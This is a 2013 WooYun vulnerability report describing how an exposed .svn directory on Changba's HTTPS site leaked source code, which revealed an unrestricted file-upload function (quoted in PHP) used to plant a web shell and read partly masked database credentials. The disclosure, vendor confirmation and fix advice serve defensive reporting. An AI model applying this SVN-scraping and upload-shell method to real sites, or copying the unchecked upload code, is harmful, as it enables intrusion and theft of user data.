当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-036663

漏洞标题:敏感信息泄露系列#1 系统管理员运维不当导致唱吧3000万+用户信息告急

相关厂商:Changba-inc

漏洞作者: 猪猪侠

提交时间:2013-09-10 14:07

修复时间:2013-10-25 14:08

公开时间:2013-10-25 14:08

漏洞类型:重要敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-09-10: 细节已通知厂商并且等待厂商处理中
2013-09-10: 厂商已经确认,细节仅向厂商公开
2013-09-20: 细节向核心白帽子及相关领域专家公开
2013-09-30: 细节向普通白帽子公开
2013-10-10: 细节向实习白帽子公开
2013-10-25: 细节向公众公开

简要描述:

有时候,一个微不足道的信息泄露问题就能造成整个企业安全的崩盘。
#安全需要顾全整体#

详细说明:

#1 信息泄露源
由于唱吧主站服务器WEB服务端配置缺陷,以及开发人员代码上线安全意识不足,直接将版本控制软件SVN所残留的信息发布到了线上。
WooYun: Changba-inc唱吧svn敏感信息泄露
白帽子曾经报告过一个svn信息泄露威胁,但唱吧的修复方案只是简单的针对http://访问源进行了限制,而对https的配置并未生效,导致仍然存在缺陷。
https://changba.com/.svn/entries
#2 写个自动化工具扫描,并爬行泄露的源码

svn_disclosure.py https://changba.com /
******************************************
* Fetching: https://changba.com
* mkdir changba.com
* http://www.kulv.com/repos/kulv/KTV/www
* http://www.kulv.com/repos/kulv
******************************************
DIR: \
DIR: \help
DIR: \common
DIR: \css
DIR: \voiceofchina
DIR: \banzou
DIR: \incoming
DIR: \personcenter
DIR: \Twig
DIR: \payment
DIR: \activity
DIR: \fm
DIR: \member
DIR: \exportsong
DIR: \game
DIR: \js
DIR: \newindex
DIR: \competition
DIR: \rules
DIR: \account
DIR: \views
DIR: \history
DIR: \signup
DIR: \cashout
DIR: \datePicker
DIR: \games
DIR: \anniversary
DIR: \yunying
DIR: \images
DIR: \agreement
DIR: \data
******************************************
FILE: \mobsong_notfound.html
FILE: \competition_controller.php
FILE: \crontab_share_activity_statistics.php
FILE: \d.html
FILE: \crontab_make_songindex_db.php
FILE: \index.html
FILE: \wochangba.php
FILE: \appstore.php
FILE: \banner_area.php
FILE: \CompetitionMain.php
FILE: \yunying.php
FILE: \help.html
FILE: \question.php
FILE: \pcsong_notfound.html
FILE: \gamegift.php
FILE: \redirect_index.php
FILE: \Activity_Mem.php
FILE: \stats.php
FILE: \buy.php
FILE: \static_activity_page.php
FILE: \recommond.html
FILE: \mindex.html
FILE: \activity_new.php
FILE: \makerecommenduser.php
FILE: \activity_ios.php
FILE: \contact.html
FILE: \qqvipgift.php
FILE: \policy.html
FILE: \old_index.html
FILE: \crontab_share_activity_statistics2.php
FILE: \updateapp.php
FILE: \activity.php
FILE: \qq_callback.php
FILE: \Mobile_Detect.php
FILE: \exchangecenter.html
FILE: \staticcompetition.php
FILE: \gamegift1.php
FILE: \alert.php
FILE: \login.php
FILE: \favicon.ico
FILE: \game.php
FILE: \recommend.php
FILE: \changba_unicom.html
FILE: \crontab_make_songlist_db.php
FILE: \login_success.html
FILE: \guide_sing.php
FILE: \gamehome.php
FILE: \videotest.html
FILE: \activity_no_build.html
FILE: \download.html
FILE: \redirect_song.php
FILE: \anzhuang.html
FILE: \RecommendMusicService.php
******************************************
Author: tianran
Author: guoteng
Author: gaojie
Author: luohongjian
Author: liuyutong
Author: wuhaiwen
Author: xiaokai.zhan
Author: zhouhaixu
Author: eric
Author: chenzhuo
Author: kongmiaomiao
******************************************


#3 获取了源码,即可针对代码进行代码审计或其它漏洞挖掘

changba_svn_download.jpg


#4 针对源码挖掘,发现其中一个上传漏洞
\competition\common_functions.php 159行

/**
 * 主办方上传授权协议
 * 
 * @return 如果出错返回相应的errorcode
 */
function uploadAgreement() {
	$result = array ();
	if (! isset ( $_FILES ['agreement'] ['name'] ) || empty ( $_FILES ['agreement'] ['name'] )) {
		$result ['errorcode'] = "EMPTY";
	} elseif ($_FILES ["agreement"] ["error"] > 0) {
		$result ['errorcode'] = "FAIL";
	} elseif (($_FILES ["agreement"] ["size"] / 1024) > 10240) {
		$result ['errorcode'] = "EXCEED_SIZE";
	} else {
		$fileDir = "/home/wwwroot/www.changba.com/agreement/";
		if (! file_exists ( $fileDir )) {
			mkdir ( $fileDir, 0777 );
		}
		$currentTimestamp = strtotime ( date ( "Y-m-d H:i:s" ) );
		$filename = $currentTimestamp . $_FILES ["agreement"] ["name"];
		$realPath = $fileDir . $filename;
		if (move_uploaded_file ( $_FILES ["agreement"] ["tmp_name"], $realPath )) {
			$result ['errorcode'] = "OK";
			$result ['filename'] = $filename;
		} else {
			$result ['errorcode'] = "FAIL";
		}
	}
	return $result;
}


changba_upload.jpg


漏洞证明:

#5 任意文件上传漏洞利用

changba_shell.jpg


#6 查看数据库配置信息

<?php
// =============================
// ======  纵切专用库  ===========
// =============================
/*mysql client 写数据库地址*/
$config['ZuitaoKtvServer_client']['servername'] = '192.168.*.***';
$config['ZuitaoKtvServer_client']['port'] = 3306;
$config['ZuitaoKtvServer_client']['username'] = '******';
$config['ZuitaoKtvServer_client']['password'] = 'PS***********94';
$config['ZuitaoKtvServer_client']['pconnect'] = 0;
$config['ZuitaoKtvServer_client']['dbname'] = 'changba_client';
$config['ZuitaoKtvServer_client']['charset'] = 'utf8';
/*mysql client 读数据库地址*/
$config['ZuitaoKtvServer_client_read']['servername'] = '192.168.*.***';
$config['ZuitaoKtvServer_client_read']['port'] = 3306;
$config['ZuitaoKtvServer_client_read']['username'] = '****';
$config['ZuitaoKtvServer_client_read']['password'] = 'PS***********94';
$config['ZuitaoKtvServer_client_read']['pconnect'] = 0;
$config['ZuitaoKtvServer_client_read']['dbname'] = 'changba_client';
$config['ZuitaoKtvServer_client_read']['charset'] = 'utf8';

修复方案:

#1 漏洞修复方案修复完整
#2 找专业安全人员代码审计
#3 可以找乌云众测平台的白帽子们帮你们消灭掉存在的边界隐患

版权声明:转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-09-10 17:49

厂商回复:

记得上午已经确认了?不论如何,谢谢这位童鞋,请把联系方式告知我们,我们将作出感谢,并欢迎给出更多建议!

最新状态:

暂无